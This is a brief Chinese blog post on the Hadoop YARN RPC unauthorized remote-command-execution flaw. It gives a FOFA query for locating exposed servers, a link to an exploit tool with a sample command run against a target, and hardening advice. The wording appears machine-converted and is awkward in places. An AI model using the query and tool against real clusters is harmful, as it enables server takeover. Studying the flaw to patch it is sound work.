• https://mp.csdn.net

Hadoop Yarn RPC未授權通路漏洞

• • 💬 漏洞詳情
  • 💢影響版本
  • 📢 複現環境
  • 👀FOFA文法
  • 🐓漏洞利用
  • 🔑漏洞修複

Apache Hadoop YARN （Yet Another Resource Negotiator）是一種新的 Hadoop 資料總管，它是一個通用資源管理系統，可為上層應用提供統一的資源管理和排程，它的引入為叢集在使用率、資源統一管理和資料共享等方面帶來了巨大好處。

Hadoop Yarn預設對外開放RPC服務，攻擊者可利用RPC服務執行任意指令，進而控制伺服器。同時由于Hadoop Yarn RPC服務通路控制機制開啟方式與REST API不一樣，是以即使在 REST API有授權認證的情況下，RPC服務所在端口仍然可以未授權通路。

• 全版本

Vulfous      

app="APACHE-hadoop-YARN"      

在此感謝師傅的利用工具tql💪

https://github.com/cckuailong/YarnRpcRCE      

工具使用

java -jar YarnRpcUnauth.jar ip:port "touch /tmp/success"      

（臨時修複建議）

1. Apache Hadoop官方建議使用者開啟Kerberos認證。
2. 設定 Hadoop RPC服務所在端口僅對可信位址開放。
3. 建議更新并啟用Kerberos的認證功能，阻止未經授權的通路。